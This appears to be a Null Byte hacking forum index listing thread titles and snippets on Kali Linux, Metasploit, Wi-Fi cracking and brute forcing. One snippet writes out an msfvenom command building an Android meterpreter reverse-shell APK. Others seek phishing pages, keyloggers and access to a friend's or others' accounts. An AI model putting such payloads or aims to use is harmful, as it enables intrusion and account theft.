Null Byte Forum
Forum Thread: Deauth-Ing a Dual Band AP
Hi all I've searched the web for a similar problems but haven't had any luck with this in particular.
Forum Thread: PROBLEM After Installing KALI LINUX on MY LAPTOP WHICH Has NOW AFFECTED MY WINDOWS 7 OS (I Wanted to Dual Boot Kali Woth
Hello I have been reading on null byte a lot.
Forum Thread: How to Find Someones Location by Image
Hello, There are a couple of ways to track someones location. We can do it by grabbing there IP or we can just use the metadata stored in an image.
Forum Thread: Which Distro as main OS?
Hey guys! I've seen here are a lot of Kali tutorials and i'm wondering if its worth to use it as a main OS?
Backdoor, Listeners: How to Know if Your Computer or Smartphones Have One?
How can I find out if there's a backdoor in my computer or in my iphone or android?? And how do I get rid of it without formatting the computer or restoring the iphone?
How to: Install Metasploit Framework on Android | Part #3 - in UserLAnd
Hi My Fellow H4ck3Rs! In this Thread, I`m gonna show you how to install Metasploit Framework in UserLAnd. UserLAnd is new in LinuX industries. You can use it for Android to Android/Windows hacking. It actually works in CHROOT Environment.
Forum Thread: How to Crack Instagram 6 Digit Confirmation Code When You Have the Password?
Instagram wants me to confirm my email address but I do not have access to it anymore, I've been contacting Instagram for months but no hope. my only hope is to somehow break the 6 digit code that it sends to my old email, is there any way for that? I tried over 100 code at the same time manually and it didn't stop me so it might do the same thing for a cracker? thanks
Forum Thread: Boosting TX Power on Alfa AWUS036NHA
I've been trying to get the full 30 db out of my wireless adapters and I can't seem to find a way to actually get it to work. I have tried changing the ISO 3166-1 alpha-3 code via "iw reg set BO" etc. and it doesn't do anything, in iwconfig it still says "txpower = 20db". I guess my question would be is there actually a way to do this? Ive tried a few other methods as well with no results.
Forum Thread: Learn to Hack an Android Device Over the Internet Remotely
Hi there! I'm Joash Jeshurun & this is my first writing on this website. Today, in this post I'll reveal how hackers try to gain access into Android devices and cause disastrous effects.
Forum Thread: Cracking Passwords Using John the Ripper
Hello, today I am going to show you how to crack passwords using a Kali Linux tools. Remember, almost all my tutorials are based on Kali Linux so be sure to install it.
Forum Thread: Need Help with FatRat Over WAN
Hey, I was using Fatrat to create a reverse tcp payload for android. I have been successful in getting a metasploit session when both my attacker and target are on the same LAN.
How to: Embed MSF Payload in Original APK Files | Part #1 - Using TheFatRAT
NOTE: This Method Also works on Kali Linux on UserLAnd (Android) & Windows 10 (WSL System) NOTE: For UserLAnd and WSL users: If some of the following commands don't work, then use sudo command at the first.
Forum Thread: I Wan't to Learn Pentesting, and Planning to Learn Both C++ and Python. But I'm Not Sure About What I Should Start With?
I want to be able to: Develop malwares and exploits
Forum Thread: How Do I Access Different Directories Within Android via Meterpreter
I opened a meterpreter session on my android phone and was able to run all the basic commands such as dumpcalllog and webcamlist etc... however when i try to access and/or change directories such as /Internal storage/DCIM/Camera using the 'cd' command i get a stdapi error, and i believe it is due to there being a space within the internal storage directory, but im not positive... is there a work around for this? ive looked up so many different pages to find this answer and i cannot seem to fi...
Forum Thread: Best Programming Language?
Hey, Which language would you recomm for me, for this hacking stuff?
Forum Thread: Fix Meterpreter Problem
Hi, lots of people including me had a problem in the meterpreter. Just Like this : Here, I will show you how I solved this problem.
Forum Thread: What Are Some Good Budget Laptops for Pentestin
I've needed a decent laptop for a while, and figured that this would be a good place to ask. My budget isn't huge, probably up to $600 or $700. Any suggestions?
Forum Thread: Kali Linux Boot Error
Hey Sup hackers, I installed kali Linux (Linux kali 5.2.0-kalu2-amd64 #1 SMP Debian 5.2.9kali1 (2019-0822) x86_64 GNU/Linux) on live usb persistence mode as per the guidelines given on kali documentation.
Forum Thread: I Want to Hack in to My Friends System Through his wifi router i am controlling
recently i went to his room i connected to his wifi network he gave me the password,i tried to open wifi control panel luckily he left with default username and password.
Forum Thread: Kali linux command error. Kindly help
Hello techies? I'm using Debian, Kali to be exact. Whenever I try sudo su, it executes the /usr/bin/zsh and I don't know how I set this or how to bring it back to normal. Someone to help
Forum Thread: How to Create a Python Remote Keylogger for Facebook
Hi guys, I am back. And as I promised I will be bringing you a way to hack someone's facebook. You can use it for any other thing as well, not just facebook. Let's get started.
Forum Thread: Kali Linux Handshake Porblem
So, I got a problem that I have 0 ideas how to solve. Trying to crack my own wifi, with the ALFA AWUS036ACH network adapter...
Forum Thread: Port Forwarding Problem in Metasploit Can't Establish Connection (WAN)
Hi, i am having a very weird problem i set up my payload with msfvenom here is my output: msfvenom -p android/meterpreter/reversetcp LHOST=Public Ip LPORT=4444 R > /root/Desktop/android.apk
Forum Thread: GMail Brute Force Dictionary Attack Script
Hey everybody. So this week I've been making it my mission to learn a bit about THC Hydra and all the little bells and whistles it has to offer — trust me, there are A LOT.
Forum Thread: Msfvenom Android Exploitation Outside LAN?
I have had success with msfvenom android payload over LAN but now I want to test it outside LAN. Like when you and the victim are connected to different gateways.
Forum Thread: How to decrypt .CAP file of handshake during WiFi attack
I'm new to Linux, and recently tried WiFi hacking with the built-in tool in kali Linux i.e Wifite. I managed to capture handshake file. But the application couldn't crack the password with the help of brute force. Is there any other way I can decrypt the password from the .CAP file generated???
Forum Thread: How Do You Make a Completely Undetectable Phishing Page?
Hi, I want to have a phishing page hosted on a hosting website. Preferably a free hosting website but I wouldn't mind purchasing hosting. I have read now that hosting companies now have scanners that detect phishing pages.
Forum Thread: Black Hydra Brute Force Help
I am new to this whole realm of the computer so I do apprecate your patience and help. I am running Black Hydra Brute Force (Option 4 - Gmail) and I am stuck on what do do next.
Forum Thread: How to Install Kali Linux on Iphone or Ipad
Hi all. Awesome website. Do you know how ti install kali linux on ipad or iphone?
Forum Thread: How to Use NGROK in a Reverse_Tcp Attack?
I was thinking of using ngrok in a reverse_tcp attack over the internet on Kali Linux. But couldn't do so, I didn't get an open session, I use the ngrok url in place of the LHOST while creating the payload.
Forum Thread: Track phone using imei number.
My Phone Just Got Stolen and I Have the Imei Number. Is There a Way I Could Get the Location of the Phone Using the Imei Number. Thank You.
Forum Thread: Security in IOT ( Internet of Things ) By [Mohamed Ahmed]
Hello friends . we have been increasingly bombed by IOT ( internet of things ) that's why i am writing this thread .since it is inevitable progress, interaction, and acquisition of the products that are under this implementation.
Forum Thread: When to Use Reverse Shell and Bind Shell?
I got some information and i got to know that reverse shell is when attacker listen and victim tries to connect to attacker and in bind shell attacker connects to victim but i want know at what condition a hacker or pentester uses reverse shell or bind shell?which is mostly used by hackers?when a reverse shell should be used and when should bind shell should be used
Forum Thread: Fluxion Not Working
Hello everyone, im new to wifi hacking and cracking and i really like fluxion. However when i use fluxion after ive chosen the network,chosen deauth option,made certificate after doing all that at teh end when everything is setup. Nothing happens it doesnt work. Also do you need to be connected to wifi while doing this because when i select language it closes NetworkManager. Thanks.
Forum Thread: Hacking Stream (LIVE)
here and here
Forum Thread: Blind SQL Injection
After a scan with Acunetix I found a vulnerability "Blind SQL Injection". Now what should I do?
Forum Thread: Can C Programming Help Me for Hacking or Pen Testing.
I am going to learn programming language and my friends are suggesting me to learn C. need help...
Forum Thread: How to Use the Exploits Found in Vega Scan
Hi all null byters!!:)
Forum Thread: Can I Send a File to a Computer Using Ip Address
Is there anyway i can send a file to a computer using its ip address .